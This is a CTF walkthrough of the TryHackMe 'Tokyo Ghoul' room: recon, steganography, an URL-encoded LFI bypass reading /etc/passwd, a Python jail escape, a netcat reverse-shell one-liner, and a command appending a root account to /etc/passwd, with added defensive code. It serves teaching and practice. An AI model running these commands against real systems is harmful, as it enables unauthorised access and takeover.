THM ROOM: Tokyo Ghoul Walkthrough
Welcome to another exciting TryHackMe adventure! In this write-up, we’ll be exploring the Tokyo Ghoul-themed machine to uncover its secrets and vulnerabilities. Buckle up, and let’s dive into the world of Tokyo Ghoul!
THM Challenge Link: https://tryhackme.com/room/tokyoghoul666
Reconnaissance:
Our adventure begins with an initial Nmap scan to discover open ports and services running on the target machine:
sudo nmap -sV -sS -A <IP>
- Port 21 (FTP) running VSFTPD 3.0.322.
- Port 22 (SSH) running OpenSSH 7.2p2 on Ubuntu.
- Port 80 (HTTP) hosting an Apache web server on Ubuntu.
Information Gathering:
FTP Anon Login:
First, we explore the FTP service, and to our delight, it allows anonymous login. We find a directory named “need_Help?” containing some interesting files and directories:
- “Aogiri_tree.txt”
- “Talk_with_me” (directory)
- “rize_and_kaneki.jpg”, an image file
- “need_to_talk”, an ELF file (Linux executable)
Our curiosity piqued, we decide to investigate the images and the ELF file for any hidden secrets.
Linux Binary Analysis:
I executed the need_to_talk ELF file, which prompts for a password. After entering a random password, a message stating “Take a look inside of me rabin2 -z” is displayed.
Following that hint, we extract the printable ASCII strings from the binary using strings or rabin2 -z. The image below shows the result.
String extraction reveals the password. When I executed the program again and entered it, the binary printed another string that looks like a password for something else.
Steganographic Analysis:
When I run stegseek on the image (rize_and_kaneki.jpg) obtained from FTP, it asks for a passphrase. The string printed by the ELF file is the obvious candidate, and it works. Voila!! We extract a text file named “yougotme.txt”.
“yougotme.txt” contains Morse-encoded data as well as two phrases:
- “haha you are so smart kaneki but can you talk my code”
- “if you can talk it all right, you got my secret directory,”
The Morse-encoded data can be decoded with CyberChef. Decoding the Morse gives hex; decoding the hex gives base64; and decoding the base64 gives clear text naming a web directory.
We navigate to the web server and open the decoded directory. The page simply says “scan me,” which we take as a hint to use directory enumeration to find hidden directories.
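The three-hop decoding chain above (Morse, then hex, then base64) is easy to script so each stage can be inspected. The following is an added example written for this walkthrough, not code from the room or its author; SAMPLE_MORSE is a constructed string that encodes the word "hidden", since the room's real directory name is not reproduced on this page.

```python
import base64
from typing import Tuple

# International Morse for the digits and A-F, which is all a hex string needs.
MORSE_TO_HEX = {
    "-----": "0", ".----": "1", "..---": "2", "...--": "3", "....-": "4",
    ".....": "5", "-....": "6", "--...": "7", "---..": "8", "----.": "9",
    ".-": "A", "-...": "B", "-.-.": "C", "-..": "D", ".": "E", "..-.": "F",
}
HEX_TO_MORSE = {v: k for k, v in MORSE_TO_HEX.items()}


def morse_to_text(morse: str) -> str:
    """Decode space-separated Morse symbols; '/' word separators are dropped."""
    out = []
    for sym in morse.split():
        if sym == "/":
            continue
        if sym not in MORSE_TO_HEX:
            raise ValueError(f"not a hex-digit Morse symbol: {sym!r}")
        out.append(MORSE_TO_HEX[sym])
    return "".join(out)


def decode_stages(morse: str) -> Tuple[str, str, str]:
    """Return (hex, base64, plaintext) so every hop of the chain can be checked."""
    hex_text = morse_to_text(morse)
    b64_text = bytes.fromhex(hex_text).decode("ascii")
    plain = base64.b64decode(b64_text, validate=True).decode("utf-8")
    return hex_text, b64_text, plain


def decode_chain(morse: str) -> str:
    """Morse -> hex -> base64 -> clear text, returning only the final string."""
    return decode_stages(morse)[2]


def encode_chain(plain: str) -> str:
    """Reverse direction, used here only to build constructed samples."""
    b64_text = base64.b64encode(plain.encode("utf-8")).decode("ascii")
    hex_text = b64_text.encode("ascii").hex().upper()
    return " ".join(HEX_TO_MORSE[c] for c in hex_text)


# Constructed sample (not the room's data):
# "hidden" -> "aGlkZGVu" -> "61476C6B5A475675" -> Morse of those hex digits.
SAMPLE_MORSE = ("-.... .---- ....- --... -.... -.-. -.... -... "
                "..... .- ....- --... ..... -.... --... .....")

if __name__ == "__main__":
    for label, value in zip(("hex", "base64", "plaintext"), decode_stages(SAMPLE_MORSE)):
        print(f"{label:>9}: {value}")
```

Because each stage is returned separately, a mistake in the Morse transcription shows up as a bytes.fromhex or base64 validation error at the hop where it happened, rather than as silent garbage at the end.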
Web Directory Enumeration:
We launch a Gobuster scan to reveal potential subdirectories:
gobuster dir -u http://<IP>/<DECODED_DIRECTORY> -x php,txt -w /usr/share/wordlists/dirb/common.txt -t 20
We discover the “/d1r3c70ry_center/claim” directory. It appears to contain a Local File Inclusion (LFI) vulnerability, but with a filter that we must bypass.
LFI Bypass:
As I have trouble finding a way past the LFI filter, I turn to resources such as HackTricks and numerous articles. We eventually come upon a GitHub repository that includes a potential bypass method: PayloadsAllTheThings.
Our exploration into bypassing LFI filters continues, and we eventually get through using the URL-encoded path:
# URL encoded: %2F == '/', %2E == '.'
%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
# URL decoded
/../../../etc/passwd
Now, with this LFI bypass, we gain access to system files, opening the door to further exploration.
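The bypass works because the filter compares the raw request string against the literal "../" and never looks at the decoded path. The following added example (written for this walkthrough, not code from the room) puts that naive check next to a hardened resolver that decodes, canonicalizes, and then refuses anything outside the web root. WEB_ROOT and the file name "index.php" are hypothetical values chosen for the demonstration.

```python
import os
from typing import Optional
from urllib.parse import unquote

# Hypothetical web root for the vulnerable page; not a path taken from the room.
WEB_ROOT = "/var/www/html/d1r3c70ry_center"


def naive_is_safe(user_path: str) -> bool:
    """Blocklist on the literal '../'. It never sees the decoded form,
    so a percent-encoded traversal passes straight through."""
    return "../" not in user_path


def hardened_resolve(user_path: str, web_root: str = WEB_ROOT) -> Optional[str]:
    """Fully decode, canonicalize, then accept only paths that stay under web_root."""
    decoded = user_path
    for _ in range(3):                    # unwind double/triple encoding
        step = unquote(decoded)
        if step == decoded:
            break
        decoded = step
    if "\x00" in decoded:                 # reject null-byte truncation attempts
        return None
    candidate = os.path.normpath(os.path.join(web_root, decoded.lstrip("/")))
    # commonpath drops to a parent directory if the candidate escaped the root
    if os.path.commonpath([web_root, candidate]) != web_root:
        return None
    return candidate


ENCODED = "%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd"   # the bypass string from above
PLAIN = "/../../../etc/passwd"

if __name__ == "__main__":
    for label, path in (("plain", PLAIN), ("encoded", ENCODED)):
        verdict = "ALLOWED" if naive_is_safe(path) else "blocked"
        print(f"naive filter, {label:<8}: {verdict}")
    print("hardened, encoded :", hardened_resolve(ENCODED))
    print("hardened, plain   :", hardened_resolve(PLAIN))
    print("hardened, index.php:", hardened_resolve("index.php"))
```

The decode loop matters: a single unquote call would still let a double-encoded "%252e%252e/" reach the filesystem layer, which may decode it again. Comparing canonical paths with os.path.commonpath, rather than searching for substrings, is what makes the check independent of how the traversal was spelled.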
User Enumeration:
With this newfound access, we decide to enumerate users on the system. After some exploration, we find the user “kamishiro.” We now have a foothold and will move forward to crack the password.
Cracking the password:
We crack the password for user “kamishiro” using John the Ripper. After some time, the very complicated and safe password is exposed: “xxx”
We now have SSH access using the following credentials:
- Username: kamishiro
- Password: xxx
Initial Foothold:
I log in over SSH and find myself in a limited environment. Because there isn’t much to investigate, our only option is the jail.py script.
Privilege Escalation:
I recall an article about Python jail escapes and sandbox exploitation and decide to explore the possibilities, trying different commands and statements. (Article about python jailbreak)
Exploiting python jail:
After reading it, I tried some trial and error until I found the exploit. It turns out that anything contained within a “print” statement is executed. To accomplish my goal, I needed to combine a print statement with the Python sandbox escape.
# List the available built-in functions
print(dir(__builtins__))
# Reach a built-in function through the builtins dictionary
print(__builtins__.__dict__['id'])
# Chain calls on the returned object
print(__builtins__.__dict__['type']('as'))
print(__builtins__.__dict__['type'](123))
Now, we have a means to execute Linux commands from Python, bypassing the jail restrictions.
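The jail fails because it filters source text rather than meaning: the later payloads spell names in upper case and call .lower() on them, so a case-sensitive substring blocklist never matches. The following added example (written for this walkthrough, not code from the room or the jail.py script, whose real filtering logic is not shown on this page) contrasts such a substring filter with a check made on the parsed syntax tree. PROBE is a constructed input in the same shape as the escape above but calling a harmless function.

```python
import ast

# Case-sensitive substring blocklist, the style of filter that 'OS'.lower() walks past.
BLOCKLIST = ("import", "os", "system", "eval", "exec", "open")


def naive_jail_allows(src: str) -> bool:
    """Allow the snippet unless a blocklisted word appears literally in the text."""
    return not any(word in src for word in BLOCKLIST)


def ast_jail_allows(src: str) -> bool:
    """Parse first, then refuse imports and any dunder name, attribute or
    string literal. Decisions are made on the tree, so changing the case of
    a literal and calling .lower() on it does not alter what is inspected."""
    try:
        tree = ast.parse(src, mode="exec")
    except SyntaxError:
        return False
    for node in ast.walk(tree):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            return False
        if isinstance(node, ast.Name) and node.id.startswith("__"):
            return False
        if isinstance(node, ast.Attribute) and node.attr.startswith("__"):
            return False
        if (isinstance(node, ast.Constant) and isinstance(node.value, str)
                and node.value.lower().startswith("__")):
            return False
    return True


# Constructed probe: same shape as the escape above, but it only calls os.getcwd.
PROBE = ("print(__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower())"
         ".__dict__['GETCWD'.lower()]())")
BENIGN = "print(sum(range(10)))"

if __name__ == "__main__":
    for name, src in (("probe", PROBE), ("benign", BENIGN)):
        naive = "allow" if naive_jail_allows(src) else "deny"
        strict = "allow" if ast_jail_allows(src) else "deny"
        print(f"{name:<6}: substring filter={naive}, AST filter={strict}")
```

Even the AST check is still a denylist; a sandbox that must hold up should instead allow only the node types it expects (literals, arithmetic, calls to a fixed set of functions) and run the code with an empty __builtins__ mapping, treating anything else as a rejection.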
Privilege Escalation Methods
We proceed to escalate our privileges and explore two potential methods:
Method 1: Reverse Shell
- Open a listener on your local machine:
nc -nlvp 5555
- Execute the following command on the target machine:
print(__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc <YOUR_TUN0_IP> 5555 >/tmp/f'))
Method 2: Editing /etc/passwd
- Generate a hashed password:
openssl passwd toor
(This creates a password hash, e.g., '$1$qw.JMQuz$RjNX2RLcJRGnz1/1jjhp10'; openssl picks a random salt each run, so your hash will differ.)
- Encode the entry for /etc/passwd (every '$' in the hash must be escaped inside double quotes, or the shell will expand it as a variable):
echo "toor:\$1\$qw.JMQuz\$RjNX2RLcJRGnz1/1jjhp10:0:0:root:/root:/bin/bash" | base64
# Output
# dG9vcjokMSRESi9aS1hjbyQvQXVYMUJlN3JpR0xkT0FCUlBVTHguOjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo=
- Execute the following command on the target machine, substituting the base64 string produced in the previous step:
print(__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('echo "dG9vcjokMSRESi9aS1hjbyQvQXVYMUJlN3JpR0xkT0FCUlBVTHguOjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo=" | base64 -d >> /etc/passwd'))
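From the defender's side, the appended entry is loud: a second UID 0 account, with its hash sitting in /etc/passwd instead of /etc/shadow. The following added example (written for this walkthrough, not code from the room) is a small passwd audit that flags exactly those conditions. SAMPLE_PASSWD is a constructed excerpt; the "toor" line reuses the example hash from the step above.

```python
from typing import Dict, List

# Constructed /etc/passwd excerpt: three ordinary entries plus the appended "toor"
# line from the escalation above (hash taken from the page's example).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
kamishiro:x:1000:1000:kamishiro:/home/kamishiro:/bin/bash
toor:$1$qw.JMQuz$RjNX2RLcJRGnz1/1jjhp10:0:0:root:/root:/bin/bash
"""

# Values that mean "password lives in /etc/shadow" or "no password login".
SHADOWED_MARKERS = {"x", "*", "!", "!!", ""}


def audit_passwd(text: str) -> Dict[str, List[str]]:
    """Return {username: [reasons]} for entries that deserve a second look."""
    findings: Dict[str, List[str]] = {}
    seen_uids: Dict[int, str] = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.setdefault(f"line {lineno}", []).append("malformed entry")
            continue
        name, pw, uid_s, _gid, _gecos, _home, _shell = fields
        reasons: List[str] = []
        try:
            uid = int(uid_s)
        except ValueError:
            reasons.append("non-numeric uid")
            uid = None
        if uid == 0 and name != "root":
            reasons.append("uid 0 but not root")
        if pw not in SHADOWED_MARKERS:
            reasons.append("password hash stored in passwd instead of shadow")
        if uid is not None:
            if uid in seen_uids:
                reasons.append(f"uid shared with {seen_uids[uid]}")
            else:
                seen_uids[uid] = name
        if reasons:
            findings[name] = reasons
    return findings


if __name__ == "__main__":
    for user, reasons in audit_passwd(SAMPLE_PASSWD).items():
        print(f"{user}: {'; '.join(reasons)}")
```

Run against a live host the same checks belong in file-integrity monitoring for /etc/passwd and /etc/shadow, where a write to either file outside a package or user-management tool is itself the alert.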
For greater clarity, below is a brief video for each of the procedures stated above.
Retrieving Flags:
With root access secured, we were able to retrieve both the user and root flags.
- The user flag was located in the “/home/kamishiro/user.txt” file.
- The root flag was stored in the “/root/root.txt” file.
Voila!!! Congratulations on clearing the Tokyo Ghoul room. Thanks to the creators (devalfo and rockyou.txt) for providing this fantastic room.